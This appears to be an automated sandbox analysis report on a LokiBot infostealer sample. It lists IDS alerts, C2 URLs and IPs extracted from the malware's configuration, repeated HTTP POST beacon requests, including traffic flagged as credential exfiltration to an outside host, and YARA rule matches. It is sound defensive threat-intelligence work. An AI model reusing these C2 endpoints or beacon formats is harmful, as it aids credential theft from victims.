Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49744 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49744 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49754 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49760 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49760 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49744 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49754 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49744 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49713 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49764 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49764 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49713 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49760 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49755 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49715 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49715 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49760 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49713 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49740 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49715 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49715 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49740 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49754 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49725 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49754 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49750 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49750 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49755 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49725 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49725 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49745 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49725 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49745 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49736 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49736 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49762 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49762 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49736 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49736 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49747 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49747 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49758 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49758 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49758 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49758 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49747 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49747 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49762 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49762 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49763 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49763 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49763 -> 104.248.205.66:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49763 -> 104.248.205.66:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://104.248.205.66/index.php/17008709

Source: Joe Sandbox View

IP Address: 104.248.205.66 104.248.205.66

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66
Source: unknown	TCP traffic detected without corresponding DNS query: 104.248.205.66

Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe

Code function: 14_2_00404ED4 recv,

14_2_00404ED4

Source: unknown

HTTP traffic detected: POST /index.php/17008709 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 104.248.205.66Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 470C3A50Content-Length: 180Connection: close

Source: PO-0Y9005373R664.exe, 00000009.00000002.2939793723.0000000001428000.00000004.00000020.00020000.00000000.sdmp, PO-0Y9005373R664.exe, 00000009.00000002.2939358140.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://104.248.205.66/index.php/17008709
Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: PO-0Y9005373R664.exe, 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VvtddClQv.exe, 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VvtddClQv.exe, VvtddClQv.exe, 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
